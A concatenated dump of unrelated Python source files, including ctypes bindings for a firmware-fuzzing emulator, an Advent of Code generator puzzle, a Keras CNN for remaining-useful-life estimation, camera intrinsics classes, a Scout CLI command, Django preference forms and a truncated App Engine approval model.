def register_value_set_mmio_models(uc, starts, ends, pcs, value_sets):
    """Register MMIO ranges whose reads are picked from fixed value sets."""
    assert len(starts) == len(ends) == len(value_sets) == len(value_sets) == len(pcs)
    starts_arr = (ctypes.c_int64 * len(starts))(*starts)
    ends_arr = (ctypes.c_int64 * len(ends))(*ends)
    pcs_arr = (ctypes.c_int32 * len(pcs))(*pcs)
    value_nums_arr = (ctypes.c_int32 * len(value_sets))(*[len(value_set) for value_set in value_sets])
    value_set_arrs = [(ctypes.c_int32 * len(value_set))(*value_set) for value_set in value_sets]
    # NOTE(review): the inner arrays hold c_int32 but are cast to
    # POINTER(c_ulong); the addresses passed are correct either way, but
    # confirm the element type against the native uint32_t** signature.
    value_sets_arr_ptrs = (ctypes.POINTER(ctypes.c_ulong) * len(value_set_arrs))(*[ctypes.cast(value_set_arr, ctypes.POINTER(ctypes.c_ulong)) for value_set_arr in value_set_arrs])
    assert native_lib.register_value_set_mmio_models(uc._uch, starts_arr, ends_arr, pcs_arr, value_nums_arr, value_sets_arr_ptrs, len(starts)) == 0

def set_ignored_mmio_addresses(addresses, pcs):
    """Mark (address, pc) pairs whose MMIO accesses consume no fuzz input."""
    addrs_arr = (ctypes.c_int64 * len(addresses))(*addresses)
    pcs_arr = (ctypes.c_uint32 * len(pcs))(*pcs)
    assert native_lib.set_ignored_mmio_addresses(
        addrs_arr, pcs_arr, len(addrs_arr)
    ) == 0
def init_nvic(uc, vtor, num_vecs, interrupt_limit=DEFAULT_MAX_INTERRUPTS, disabled_interrupts=()):
    """Initialize the native NVIC model (vector table base, vector count, limits)."""
    global native_lib
    logger.debug("Calling init_nvic with vtor=0x{:08x}, num_vecs: {}".format(vtor, num_vecs))
    disabled_interrupts_arr = (ctypes.c_int32 * len(disabled_interrupts))(*disabled_interrupts)
    assert native_lib.init_nvic(uc._uch, vtor, num_vecs, interrupt_limit, len(disabled_interrupts), disabled_interrupts_arr) == 0
def init_native_tracing(uc, bbl_set_trace_path, bbl_hash_path, mmio_set_trace_path, mmio_ranges):
    """Enable native basic-block / MMIO trace collection.

    :param uc: unicorn engine wrapper (its raw handle is passed natively).
    :param bbl_set_trace_path: output path for the basic-block set trace, or falsy to disable.
    :param bbl_hash_path: output path for the basic-block hash, or falsy to disable.
    :param mmio_set_trace_path: output path for the MMIO set trace, or falsy to disable.
    :param mmio_ranges: iterable of (start, end) MMIO address pairs.
    """
    global native_lib

    def encoded_or_none(path):
        # The native API expects NULL for "disabled"; this also maps an
        # empty string to NULL. Replaces three copies of the same branching.
        return path.encode() if path else None

    mmio_region_starts, mmio_region_ends = zip(*mmio_ranges)
    mmio_region_starts_arr = (ctypes.c_uint64 * len(mmio_region_starts))(*mmio_region_starts)
    mmio_region_ends_arr = (ctypes.c_uint64 * len(mmio_region_ends))(*mmio_region_ends)
    assert(native_lib.init_tracing(uc._uch, encoded_or_none(bbl_set_trace_path), encoded_or_none(bbl_hash_path), encoded_or_none(mmio_set_trace_path), len(mmio_ranges), mmio_region_starts_arr, mmio_region_ends_arr) == 0)
def nvic_set_pending(vec_num):
    """Mark interrupt *vec_num* as pending in the native NVIC model."""
    global native_lib
    native_lib.nvic_set_pending(vec_num)

def init_timer_hook(uc, global_timer_scale):
    """Install the central timer hook and remember its C wrapper / user data."""
    global native_lib
    global timer_cb_user_data
    global timer_cb_wrapper
    cb, user_data = _create_and_inject_c_callable_central_timer_hook(uc, timer.central_timer_hook)
    timer_cb_wrapper = cb
    timer_cb_user_data = user_data
    assert native_lib.init_timer_hook(uc._uch, global_timer_scale) == 0

def init_systick(uc, reload_val):
    """Configure the native SysTick timer with *reload_val*."""
    global native_lib
    assert native_lib.init_systick(uc._uch, reload_val) == 0
# Sentinel: the timer raises no interrupt.
IRQ_NOT_USED=0xffffffff

def add_timer(reload_val, callback=None, isr_num=IRQ_NOT_USED):
    """Create a native timer and return its id.

    :param reload_val: tick count after which the timer fires.
    :param callback: Python callback dispatched via the central timer hook,
        or None when the timer should pend an interrupt instead.
    :param isr_num: interrupt number to pend on expiry, or IRQ_NOT_USED.
    """
    global timer_cb_wrapper
    global timer_cb_user_data
    global native_lib
    assert timer_cb_wrapper is not None and timer_cb_user_data is not None
    # While technically allowed in the C code, invoking a callback and pending an interrupt at the same time is nothing we would like to support
    assert not (callback is not None and isr_num != IRQ_NOT_USED)
    # NOTE(review): the specific *callback* object is not passed natively —
    # the shared central-timer wrapper is; dispatch to the right Python
    # callback presumably happens in timer.central_timer_hook — confirm.
    passed_cb = timer_cb_wrapper if callback is not None else 0
    return native_lib.add_timer(reload_val, passed_cb, timer_cb_user_data, isr_num)
def is_running(timer_id):
    """Return the native running state of timer *timer_id*."""
    return native_lib.is_running(timer_id)

def get_global_ticker():
    """Return the native global tick counter."""
    global native_lib
    return native_lib.get_global_ticker()

def rem_timer(uc, timer_id):
    """Remove timer *timer_id*.

    NOTE(review): passes `uc` directly while most wrappers pass `uc._uch` —
    confirm callers supply the raw engine handle.
    """
    global native_lib
    assert native_lib.rem_timer(uc, timer_id) == 0

def reload_timer(timer_id):
    """Reset timer *timer_id* to its reload value.

    NOTE(review): unlike the neighbors this passes no uc handle — verify
    against the native reload_timer signature.
    """
    global native_lib
    assert native_lib.reload_timer(timer_id) == 0

def start_timer(uc, timer_id):
    """Start timer *timer_id* (see rem_timer note about the uc handle)."""
    global native_lib
    assert native_lib.start_timer(uc, timer_id) == 0

def stop_timer(uc, timer_id):
    """Stop timer *timer_id* (see rem_timer note about the uc handle)."""
    global native_lib
    assert native_lib.stop_timer(uc, timer_id) == 0
# uc_hook add_interrupt_trigger(uc_engine *uc, uint64_t addr, uint32_t irq, uint32_t num_skips, uint32_t num_pends, uint32_t do_fuzz);
def add_interrupt_trigger(uc, addr, irq, num_skips, num_pends, fuzz_mode, trigger_mode, every_nth_tick):
    """Register a native interrupt trigger at basic block *addr*."""
    assert fuzz_mode < len(FUZZ_MODES) and trigger_mode < len(TRIGGER_MODES)
    assert native_lib.add_interrupt_trigger(uc._uch, addr, irq, num_skips, num_pends, fuzz_mode, trigger_mode, every_nth_tick) == 0

def register_native_debug_hooks(uc):
    """Install the native debug hooks on the engine."""
    assert(native_lib.add_debug_hooks(uc._uch) == 0)

def load_native_lib(native_lib_path):
    """Load the native shared library and store the module-level handle."""
    global native_lib
    native_lib = _load_lib(native_lib_path)
    assert native_lib is not None

def do_exit(uc, status, sig=-1):
    """Request native emulator exit with the given status and signal."""
    # NOTE(review): passes `uc` directly; most wrappers pass `uc._uch` —
    # confirm callers supply the raw handle.
    global native_lib
    native_lib.do_exit(uc, status, sig)
def init(uc, mmio_regions, exit_at_bbls, exit_at_hit_num, do_print_exit_info, fuzz_consumption_timeout=DEFAULT_FUZZ_CONSUMPTION_TIMEOUT, instr_limit=DEFAULT_BASIC_BLOCK_LIMIT):
    """Declare all native prototypes and initialize the native library.

    :param uc: unicorn engine wrapper.
    :param mmio_regions: iterable of (start, end) MMIO address pairs.
    :param exit_at_bbls: basic-block addresses that terminate emulation.
    :param exit_at_hit_num: number of exit-bbl hits before terminating.
    :param do_print_exit_info: print exit diagnostics natively.
    :param fuzz_consumption_timeout: abort after this many blocks without fuzz consumption.
    :param instr_limit: basic-block execution limit.

    Fixes relative to the previous revision:
    - init_tracing: added the missing bbl_hash_path c_char_p argtype — the
      7-argument call in init_native_tracing did not match the 6 declared
      argtypes, so the size argument was checked against a bytes object.
    - reload_timer: removed the stray uc_engine argtype; the reload_timer()
      wrapper calls the native function with the timer id only, matching the
      documented C signature.
    """
    global native_lib
    global mmio_cb_wrapper

    # GENERAL
    # uc_err init( uc_engine *uc, exit_hook_t p_exit_hook, int p_num_mmio_regions, uint64_t *p_mmio_starts, uint64_t *p_mmio_ends, void *p_py_default_mmio_user_data, uint32_t num_exit_at_bbls, uint64_t *exit_at_bbls, uint32_t exit_at_hit_num, int p_do_print_exit_info, uint64_t fuzz_consumption_timeout, uint64_t p_instr_limit);
    _setup_prototype(native_lib, "init", ctypes.c_int, uc_engine, ctypes.c_void_p, ctypes.c_int, ctypes.c_void_p, ctypes.c_void_p, ctypes.c_void_p, ctypes.c_uint, ctypes.c_void_p, ctypes.c_uint, ctypes.c_uint, ctypes.c_uint64, ctypes.c_uint64)
    # uc_err register_cond_py_handler_hook(uc_cb_hookcode_t py_callback, uint64_t *addrs, int num_addrs)
    _setup_prototype(native_lib, "register_cond_py_handler_hook", ctypes.c_int, uc_engine, ctypes.c_void_p, ctypes.c_void_p, ctypes.c_int)
    # uc_err remove_function_handler_hook_address(uc_engine * uc, uint64_t address);
    _setup_prototype(native_lib, "remove_function_handler_hook_address", ctypes.c_int, uc_engine, ctypes.c_uint64)
    # void do_exit(uc_engine *uc, int status, int sig);
    _setup_prototype(native_lib, "do_exit", ctypes.c_int, uc_engine, ctypes.c_int, ctypes.c_int)

    # FUZZING
    _setup_prototype(native_lib, "load_fuzz", ctypes.c_int, ctypes.c_char_p)
    # uint32_t fuzz_remaining();
    _setup_prototype(native_lib, "fuzz_remaining", ctypes.c_int)
    # uint64_t num_consumed_fuzz();
    _setup_prototype(native_lib, "fuzz_consumed", ctypes.c_uint32)
    # uint32_t get_latest_mmio_fuzz_access_size();
    _setup_prototype(native_lib, "get_latest_mmio_fuzz_access_size", ctypes.c_uint32)
    # uint32_t get_latest_mmio_fuzz_access_index();
    _setup_prototype(native_lib, "get_latest_mmio_fuzz_access_index", ctypes.c_uint32)
    # char *get_fuzz_ptr(uc_engine *uc, uint32_t size);
    _setup_prototype(native_lib, "get_fuzz_ptr", ctypes.c_void_p, uc_engine, ctypes.c_uint32)
    # uc_err add_mmio_region(uc_engine *uc, uint64_t begin, uint64_t end)
    _setup_prototype(native_lib, "add_mmio_region", ctypes.c_int, uc_engine, ctypes.c_uint64, ctypes.c_uint64, ctypes.c_void_p)
    # extern uc_err register_py_handled_mmio_ranges(uc_engine *uc, uc_cb_hookmem_t py_callback, uint64_t *starts, uint64_t *ends, int num_ranges);
    _setup_prototype(native_lib, "register_py_handled_mmio_ranges", ctypes.c_int, uc_engine, ctypes.c_void_p, ctypes.c_void_p, ctypes.c_void_p, ctypes.c_int)
    # extern uc_err set_ignored_mmio_addresses(uint64_t *addresses, uint32_t *pcs, int num_addresses);
    _setup_prototype(native_lib, "set_ignored_mmio_addresses", ctypes.c_int, ctypes.c_void_p, ctypes.c_void_p, ctypes.c_int)
    # extern uc_err register_linear_mmio_models(uc_engine *uc, uint64_t *starts, uint64_t *ends, uint32_t *pcs, uint32_t *init_vals, uint32_t *steps, int num_ranges);
    _setup_prototype(native_lib, "register_linear_mmio_models", ctypes.c_int, uc_engine, ctypes.c_void_p, ctypes.c_void_p, ctypes.c_void_p, ctypes.c_void_p, ctypes.c_void_p, ctypes.c_int)
    # extern uc_err register_constant_mmio_models(uc_engine *uc, uint64_t *starts, uint64_t *ends, uint32_t *pcs, uint32_t *vals, int num_ranges)
    _setup_prototype(native_lib, "register_constant_mmio_models", ctypes.c_int, uc_engine, ctypes.c_void_p, ctypes.c_void_p, ctypes.c_void_p, ctypes.c_void_p, ctypes.c_int)
    # extern uc_err register_bitextract_mmio_models(uc_engine *uc, uint64_t *starts, uint64_t *ends, uint32_t *pcs, uint8_t *byte_sizes, uint8_t *left_shifts, uint32_t * masks, int num_ranges);
    _setup_prototype(native_lib, "register_bitextract_mmio_models", ctypes.c_int, uc_engine, ctypes.c_void_p, ctypes.c_void_p, ctypes.c_void_p, ctypes.c_void_p, ctypes.c_void_p, ctypes.c_void_p, ctypes.c_int)
    # extern uc_err register_value_set_mmio_models(uc_engine *uc, uint64_t *starts, uint64_t *ends, uint32_t *pcs, uint32_t *value_nums, uint32_t **value_lists, int num_ranges);
    _setup_prototype(native_lib, "register_value_set_mmio_models", ctypes.c_int, uc_engine, ctypes.c_void_p, ctypes.c_void_p, ctypes.c_void_p, ctypes.c_void_p, ctypes.c_void_p, ctypes.c_int)

    # NVIC
    # extern uc_err init_nvic(uc_engine *uc, uint32_t vtor, uint32_t num_irq, uint32_t interrupt_limit, uint32_t num_disabled_interrupts, uint32_t *disabled_interrupts);
    _setup_prototype(native_lib, "init_nvic", ctypes.c_int, uc_engine, ctypes.c_uint, ctypes.c_uint, ctypes.c_uint32, ctypes.c_uint32, ctypes.c_void_p)
    # extern void nvic_set_pending(int num)
    _setup_prototype(native_lib, "nvic_set_pending", ctypes.c_int, ctypes.c_int)

    # TRACING
    # uc_err init_tracing(uc_engine *uc, char *bbl_set_trace_path, char *bbl_hash_path, char *mmio_set_trace_path, size_t num_mmio_ranges, uint64_t *mmio_starts, uint64_t *mmio_ends);
    # Fixed: the bbl_hash_path c_char_p was missing from the argtypes.
    _setup_prototype(native_lib, "init_tracing", ctypes.c_int, uc_engine, ctypes.c_char_p, ctypes.c_char_p, ctypes.c_char_p, ctypes.c_uint64, ctypes.c_void_p, ctypes.c_void_p)

    # DEBUG
    # uc_err add_debug_hooks(uc_engine *uc)
    _setup_prototype(native_lib, "add_debug_hooks", ctypes.c_int, uc_engine)

    # TIMER
    # extern uint64_t get_global_ticker();
    _setup_prototype(native_lib, 'get_global_ticker', ctypes.c_int64)
    # extern uc_err init_timer_hook(uc_engine *uc, uint32_t global_timer_scale);
    _setup_prototype(native_lib, "init_timer_hook", ctypes.c_int, uc_engine, ctypes.c_uint)
    # extern uint32_t add_timer(int64_t reload_val, void *trigger_callback, void *user_data, uint32_t isr_num);
    _setup_prototype(native_lib, "add_timer", ctypes.c_int, ctypes.c_uint64, ctypes.c_void_p, ctypes.c_void_p, ctypes.c_uint32)
    # extern uc_err rem_timer(uc_engine *uc, uint32_t id);
    _setup_prototype(native_lib, "rem_timer", ctypes.c_int, uc_engine, ctypes.c_uint32)
    # extern uc_err reload_timer(uint32_t id);
    # Fixed: dropped the stray uc_engine argtype; the wrapper passes only the id.
    _setup_prototype(native_lib, "reload_timer", ctypes.c_int, ctypes.c_uint32)
    # extern uc_err start_timer(uc_engine *uc, uint32_t id);
    _setup_prototype(native_lib, "start_timer", ctypes.c_int, uc_engine, ctypes.c_uint32)
    # extern uc_err stop_timer(uc_engine *uc, uint32_t id);
    _setup_prototype(native_lib, "stop_timer", ctypes.c_int, uc_engine, ctypes.c_uint32)

    # SYSTICK
    # extern uc_err init_systick(uc_engine *uc, uint32_t reload_val);
    _setup_prototype(native_lib, "init_systick", ctypes.c_int, uc_engine, ctypes.c_uint32)

    # INTERRUPT TRIGGERS
    # uc_hook add_interrupt_trigger(uc_engine *uc, uint64_t addr, uint32_t irq, uint32_t num_skips, uint32_t num_pends, uint32_t fuzz_mode, uint32_t trigger_mode, uint64_t every_nth_tick);
    _setup_prototype(native_lib, "add_interrupt_trigger", ctypes.c_int, uc_engine, ctypes.c_uint64, ctypes.c_uint32, ctypes.c_uint32, ctypes.c_uint32, ctypes.c_uint32, ctypes.c_uint32, ctypes.c_uint64)

    # Starting emulation
    # uc_err emulate(uc_engine *uc, char *input_path, char *prefix_input_path);
    _setup_prototype(native_lib, "emulate", ctypes.c_int, uc_engine, ctypes.c_char_p, ctypes.c_char_p)

    mmio_region_starts, mmio_region_ends = zip(*mmio_regions)
    mmio_region_starts_arr = (ctypes.c_int64 * len(mmio_region_starts))(*mmio_region_starts)
    mmio_region_ends_arr = (ctypes.c_int64 * len(mmio_region_ends))(*mmio_region_ends)

    # Install the default MMIO access handler and keep its C wrapper alive.
    mmio_cb_wrapper, user_data = _create_and_inject_c_callable_mem_hook(uc, mmio_access_handler_wrapper_hook)

    if has_exit_hooks():
        exit_cb = ctypes.cast(EXIT_CB(invoke_exit_callbacks), EXIT_CB)
        obj_refs.append(exit_cb)
    else:
        exit_cb = 0

    num_exit_at_bbls = len(exit_at_bbls)
    exit_at_bbls_arr = (ctypes.c_int64 * len(exit_at_bbls))(*exit_at_bbls)

    assert native_lib.init(uc._uch, exit_cb, len(mmio_regions), mmio_region_starts_arr, mmio_region_ends_arr, user_data, num_exit_at_bbls, exit_at_bbls_arr, exit_at_hit_num, do_print_exit_info, fuzz_consumption_timeout, instr_limit) == 0
| StarcoderdataPython |
3229256 | """ Advent of code 2017 day 15/1 """
from argparse import ArgumentParser
class Generator(object):
    """Linear-congruential value generator (AoC 2017 day 15).

    Each step produces ``(previous * factor) mod 2147483647`` starting
    from the given initial seed; instances are their own infinite iterator.
    """

    def __init__(self, factor, initial, name):
        """Remember the multiplier, the current value and a debug label."""
        self.factor = factor
        self.prev_value = initial
        self.name = name

    def __iter__(self):
        """The generator is its own iterator."""
        return self

    def __next__(self):
        """Advance the sequence by one step and return the new value."""
        value = (self.prev_value * self.factor) % 2147483647
        self.prev_value = value
        return value
class Judge(object):
    """Counts generator pairs whose lowest 16 bits agree (AoC 2017 day 15)."""

    def __init__(self, generators, pair_count):
        """Take a (gen_a, gen_b) pair of iterators and how many pairs to judge."""
        self.gen_a, self.gen_b = generators
        self.pair_count = pair_count

    @staticmethod
    def compare(val_1, val_2):
        """True when the lowest 16 bits of both values are equal."""
        return (val_1 & 0xffff) == (val_2 & 0xffff)

    def process(self):
        """Draw ``pair_count`` value pairs and return how many compare equal."""
        matched = 0
        for index in range(self.pair_count):
            # Progress heartbeat: one line per million pairs (index 0 included).
            if (index % 1000000) == 0:
                print(index)
            value_a = next(self.gen_a)
            value_b = next(self.gen_b)
            if self.compare(value_a, value_b):
                matched += 1
        return matched
def read_data(data):
    """Parse the puzzle input: return the trailing integer of each line."""
    values = []
    for line in data.split('\n'):
        # Slice from the last space onward; int() ignores the leading blank.
        values.append(int(line[line.rfind(" "):]))
    return values
def solution(data):
    """Solve part 1: judge 40 million pairs from the two seeded generators."""
    seed_a, seed_b = read_data(data)
    judge = Judge(
        [Generator(16807, seed_a, 'A'), Generator(48271, seed_b, 'B')],
        40000000,
    )
    return judge.process()
if __name__ == "__main__":
    PARSER = ArgumentParser()
    PARSER.add_argument("--input", dest='input', action='store_true')
    PARSER.add_argument("--test")
    ARGS = PARSER.parse_args()
    if ARGS.input:
        # Read the puzzle input from disk.
        with open('input.txt', 'r') as input_file:
            print(solution(input_file.read()))
    elif ARGS.test:
        # Treat the --test argument itself as the input text.
        print(solution(str(ARGS.test)))
    else:
        # Fall back to the worked example from the puzzle statement.
        DEBUG = """Generator A starts with 65
Generator B starts with 8921"""
        print(solution(DEBUG))
| StarcoderdataPython |
9686840 | <gh_stars>0
#!/usr/bin/env python
def fact(n):
    """Return n! computed iteratively (fact(0) == fact(1) == 1)."""
    product = 1
    # Multiplying from 2 upward; 1 is a no-op factor.
    for factor in range(2, n + 1):
        product *= factor
    return product
if __name__ == '__main__':
    # Prompt, convert and print in one pass; int() raises on bad input.
    print(fact(int(input('Input a small number: '))))
| StarcoderdataPython |
11324747 |
from rul_pm.models.keras.keras import KerasTrainableModel
from tensorflow.keras import Input, Model, optimizers
from tensorflow.keras.layers import (Concatenate, Conv2D, Dense, Dropout,
Flatten, Permute, Reshape)
class MVCNN(KerasTrainableModel):
    """
    Model presented in Remaining useful life estimation in prognostics using deep convolution neural networks
    Default parameters reported in the article
    Number of filters: 10
    Window size: 30/20/30/15
    Filter length: 10
    Neurons in fully-connected layer 100
    Dropout rate 0.5
    batch_size = 512
    Parameters
    -----------
    n_filters : int
    filter_size : int
    window: int
    batch_size: int
    step: int
    transformer
    shuffle
    models_path
    patience: int = 4
    cache_size: int = 30
    """
    def __init__(self,
                 shape: tuple,
                 dropout: float,
                 window: int,
                 batch_size: int,
                 step: int, transformer,
                 shuffle, models_path,
                 patience: int = 4,
                 cache_size: int = 30,
                 **kwargs):
        """Store the feature-grid shape and dropout rate; forward the rest
        of the configuration to the KerasTrainableModel base class."""
        super().__init__(window,
                         batch_size,
                         step,
                         transformer,
                         shuffle,
                         models_path,
                         patience=patience,
                         cache_size=cache_size,
                         **kwargs)
        # shape is the 2-D grid (rows, cols) the per-window feature vector is
        # reshaped into before the 2-D convolutions; rows * cols must equal
        # the transformer's feature count (see the Reshape in build_model).
        self.shape = shape
        self.dropout = dropout
    def compile(self):
        """Compile the underlying Keras model with the article's Adam
        settings (beta_1=0.85, beta_2=0.9, epsilon=1e-3, amsgrad=True)."""
        self.compiled = True
        self.model.compile(
            loss=self.loss,
            # NOTE(review): `lr` is the legacy Keras argument name; newer
            # TF/Keras releases expect `learning_rate` — confirm against the
            # pinned tensorflow version before upgrading.
            optimizer=optimizers.Adam(lr=self.learning_rate,
                                      beta_1=0.85,
                                      beta_2=0.9,
                                      epsilon=0.001,
                                      amsgrad=True),
            metrics=self.metrics)
    def build_model(self):
        """Build the multi-scale CNN.

        The (window, n_features) input is transposed and reshaped into a
        (shape[0], shape[1], window) image, run through parallel 2x2, 3x3 and
        5x5 convolution branches concatenated with the 1x1 branch, collapsed
        by a convolution the size of the whole grid, and finished with a
        two-layer dense head producing a single regression output.
        """
        n_features = self.transformer.n_features
        input = Input(shape=(self.window, n_features))
        x = input
        # (window, features) -> (features, window) -> (shape0, shape1, window)
        x = Permute((2, 1))(x)
        x = Reshape((self.shape[0], self.shape[1], self.window))(x)
        x = Conv2D(self.window, (1, 1), activation='relu', padding='same')(x)
        # Three parallel branches with increasing receptive fields.
        x1 = Conv2D(self.window, (2, 2), activation='relu', padding='same')(x)
        x1 = Conv2D(self.window, (2, 2), activation='relu', padding='same')(x1)
        x2 = Conv2D(self.window, (3, 3), activation='relu', padding='same')(x)
        x2 = Conv2D(self.window, (3, 3), activation='relu', padding='same')(x2)
        x3 = Conv2D(self.window, (5, 5), activation='relu', padding='same')(x)
        x3 = Conv2D(self.window, (5, 5), activation='relu', padding='same')(x3)
        # Branches are stacked along axis 1 (rows), then collapsed.
        x = Concatenate(axis=1)([x, x1, x2, x3])
        x = Conv2D(self.window, self.shape)(x)
        x = Flatten()(x)
        x = Dense(100, activation='relu')(x)
        x = Dropout(self.dropout)(x)
        x = Dense(100, activation='relu')(x)
        x = Dropout(self.dropout)(x)
        # Single linear unit: the predicted remaining useful life.
        output = Dense(1)(x)
        model = Model(
            inputs=[input],
            outputs=[output],
        )
        return model
    @property
    def name(self):
        """Model identifier used by the framework."""
        return "MVCNN"
| StarcoderdataPython |
3493107 | from abc import ABC, abstractmethod
import numpy as np
class Intrinsics(ABC):
    """Abstract camera intrinsics.

    Concrete subclasses supply the focal lengths, principal point and image
    size; this base class derives the homogeneous 4x4 calibration matrix
    ``K`` and a copy of it normalized by the image dimensions.
    """

    @property
    @abstractmethod
    def f_x(self) -> np.float32:
        """Focal length along x, in pixels."""

    @property
    @abstractmethod
    def f_y(self) -> np.float32:
        """Focal length along y, in pixels."""

    @property
    @abstractmethod
    def c_x(self) -> np.float32:
        """Principal point x coordinate, in pixels."""

    @property
    @abstractmethod
    def c_y(self) -> np.float32:
        """Principal point y coordinate, in pixels."""

    @property
    @abstractmethod
    def height(self) -> int:
        """Image height in pixels."""

    @property
    @abstractmethod
    def width(self) -> int:
        """Image width in pixels."""

    @property
    def K(self) -> np.ndarray:
        """Homogeneous 4x4 calibration matrix, dtype float32."""
        matrix = np.zeros((4, 4), dtype='float32')
        matrix[0, 0] = self.f_x
        matrix[0, 2] = self.c_x
        matrix[1, 1] = self.f_y
        matrix[1, 2] = self.c_y
        matrix[2, 2] = 1.0
        matrix[3, 3] = 1.0
        return matrix

    @property
    def normalized_K(self):
        """``K`` with row 0 divided by the width and row 1 by the height."""
        scaled = self.K
        scaled[0, :] /= self.width
        scaled[1, :] /= self.height
        return scaled
class CylindricalIntrinsics(Intrinsics):
    """Fixed intrinsics for the 2048x1024 cylindrical images."""

    @property
    def width(self) -> int:
        return 2048

    @property
    def height(self) -> int:
        return 1024

    @property
    def f_x(self) -> np.float32:
        return np.float32(325.949323452201668)

    @property
    def f_y(self) -> np.float32:
        return np.float32(1023.000000000000000)

    @property
    def c_x(self) -> np.float32:
        # Principal point at the horizontal center of the 2048-wide image.
        return np.float32(1024.000000000000000)

    @property
    def c_y(self) -> np.float32:
        return np.float32(511.500000000000000)
class SphericalIntrinsics(Intrinsics):
    """Fixed intrinsics for the 2048x1024 spherical images."""

    @property
    def width(self) -> int:
        return 2048

    @property
    def height(self) -> int:
        return 1024

    @property
    def f_x(self) -> np.float32:
        return np.float32(325.949323452201668)

    @property
    def f_y(self) -> np.float32:
        # Same focal length on both axes for this model.
        return np.float32(325.949323452201668)

    @property
    def c_x(self) -> np.float32:
        return np.float32(1024.000000000000000)

    @property
    def c_y(self) -> np.float32:
        return np.float32(512.000000000000000)
class PinholeIntrinsics(Intrinsics):
    """Fixed intrinsics for the 768x768 pinhole camera with a 100° FOV."""

    @property
    def width(self) -> int:
        return 768

    @property
    def height(self) -> int:
        return 768

    @property
    def f_x(self) -> np.float32:
        return np.float32(322.2142583720755)

    @property
    def f_y(self) -> np.float32:
        return np.float32(322.2142583720755)

    @property
    def c_x(self) -> np.float32:
        # Principal point at the image center (768 / 2? — value as given).
        return np.float32(384.0)

    @property
    def c_y(self) -> np.float32:
        return np.float32(384.0)

    @property
    def fov(self) -> int:
        """Field of view in degrees."""
        return 100
class Pinhole90Intrinsics(Intrinsics):
    """Fixed intrinsics for the 768x768 pinhole camera with a 90° FOV."""

    @property
    def width(self) -> int:
        return 768

    @property
    def height(self) -> int:
        return 768

    @property
    def f_x(self) -> np.float32:
        return np.float32(384.0)

    @property
    def f_y(self) -> np.float32:
        return np.float32(384.0)

    @property
    def c_x(self) -> np.float32:
        return np.float32(384.0)

    @property
    def c_y(self) -> np.float32:
        return np.float32(384.0)

    @property
    def fov(self) -> int:
        """Field of view in degrees."""
        return 90
| StarcoderdataPython |
# Path to the raw Adult census CSV as downloaded.
TRAINING_FILE_ORIG = '../input/adult.csv'
# Presumably the same data with fold assignments added for cross-validation
# (the name suggests k-fold splits) — confirm against the generating script.
TRAINING_FILE = '../input/adult_folds.csv'
| StarcoderdataPython |
12803939 | <reponame>gmc-norr/scout
import logging
import click
from flask.cli import with_appcontext
from scout.server.extensions import store
LOG = logging.getLogger(__name__)
@click.command("institutes", short_help="Display institutes")
@click.option("-i", "--institute-id", help="What institute to show")
@click.option("--json", help="Show json format", is_flag=True)
@with_appcontext
def institutes(institute_id, json):
    """Show all institutes in the database"""
    LOG.info("Running scout view institutes")
    adapter = store
    # Collect either the single requested institute or all of them.
    if institute_id:
        institute_obj = adapter.institute(institute_id)
        if not institute_obj:
            LOG.info("Institute %s does not exist", institute_id)
            return
        institute_objs = [institute_obj]
    else:
        institute_objs = list(adapter.institutes())
    if len(institute_objs) == 0:
        click.echo("No institutes found")
        raise click.Abort()
    if not json:
        # Tab-separated header derived from the first document's keys.
        header = "".join("{0}\t".format(key) for key in institute_objs[0].keys())
        click.echo(header)
    for institute_obj in institute_objs:
        if json:
            click.echo(institute_obj)
        else:
            # One tab-separated row of values per institute.
            row = "".join("{0}\t".format(value) for value in institute_obj.values())
            click.echo(row)
| StarcoderdataPython |
5155110 | <gh_stars>0
from six import string_types
from django import forms
from django.core.exceptions import ValidationError
from collections import OrderedDict
from .registries import user_preferences_registry
from ..forms import (
SinglePerInstancePreferenceForm,
preference_form_builder,
PreferenceForm
)
from ..exceptions import NotFoundInRegistry
from .models import UserPreferenceModel
class UserSinglePreferenceForm(SinglePerInstancePreferenceForm):
    """Model form for editing a single ``UserPreferenceModel`` row."""

    class Meta:
        model = UserPreferenceModel
        fields = SinglePerInstancePreferenceForm.Meta.fields
def user_preference_form_builder(instance, preferences=None, **kwargs):
    """Build a :py:class:`UserPreferenceForm` bound to *instance*.

    A shortcut for
    :py:func:`preference_form_builder(UserPreferenceForm, preferences, **kwargs)`.

    :param instance: a :py:class:`django.contrib.auth.models.User` instance
    :param preferences: optional list restricting which preferences appear
        in the form; defaults to all of them (empty list downstream)
    """
    # BUG FIX: the default used to be a shared mutable list (`preferences=[]`),
    # which downstream code could mutate across calls. ``None`` is now the
    # sentinel; an empty list is still what gets passed on by default.
    return preference_form_builder(
        UserPreferenceForm,
        preferences if preferences is not None else [],
        model={'instance': instance},
        **kwargs)
class UserPreferenceForm(PreferenceForm):
    """Preference form backed by the user preferences registry."""

    registry = user_preferences_registry
| StarcoderdataPython |
11286515 | import airlock
from . import emails
from . import sync
from . import messages
from . import models
from google.appengine.datastore import datastore_query
from google.appengine.ext import ndb
from google.appengine.ext.ndb import msgprop
from protorpc import protojson
import csv
import io
import json
import logging
PER_PAGE = 200
class User(models.Model, airlock.User):
    """Minimal datastore user: an email address plus message conversion."""

    email = ndb.StringProperty()
    _message_class = messages.UserMessage

    def to_message(self):
        """Serialize this user into its protorpc message representation."""
        msg = self._message_class()
        msg.email = self.email
        return msg
class Approval(models.BaseResourceModel):
    """A user's access-approval request: the submitted form, its review
    status (pending/approved/rejected) and who last updated it.

    NOTE(review): this module uses ``unicode`` (see to_csv), so it targets
    Python 2 as written.
    """
    _message_class = messages.ApprovalMessage
    created = ndb.DateTimeProperty(auto_now_add=True)
    # The submitted form; 'folders' is indexed so approvals can be queried by folder.
    form = msgprop.MessageProperty(
        messages.ApprovalFormMessage, indexed_fields=['folders'])
    user_key = ndb.KeyProperty()
    user = ndb.StructuredProperty(User)
    domain = ndb.StringProperty()
    # NOTE(review): duplicate of the line above — the second binding simply
    # re-assigns the same property; one of the two can be removed.
    domain = ndb.StringProperty()
    updated_by_key = ndb.KeyProperty()
    updated_by = ndb.StructuredProperty(User)
    status = msgprop.EnumProperty(messages.Status, default=messages.Status.PENDING)
    updated = ndb.DateTimeProperty(auto_now=True)
    # Columns (and their order) for the CSV export in to_csv().
    _csv_header = [
        'company',
        'company_email',
        'company_type',
        'country',
        'created',
        'email',
        'email_opt_in',
        'first_name',
        'folders',
        'job_title',
        'internal_contact_email',
        'justification',
        'last_name',
        'region',
    ]
    def to_message(self):
        """Convert to an ApprovalMessage, lazily migrating legacy entities
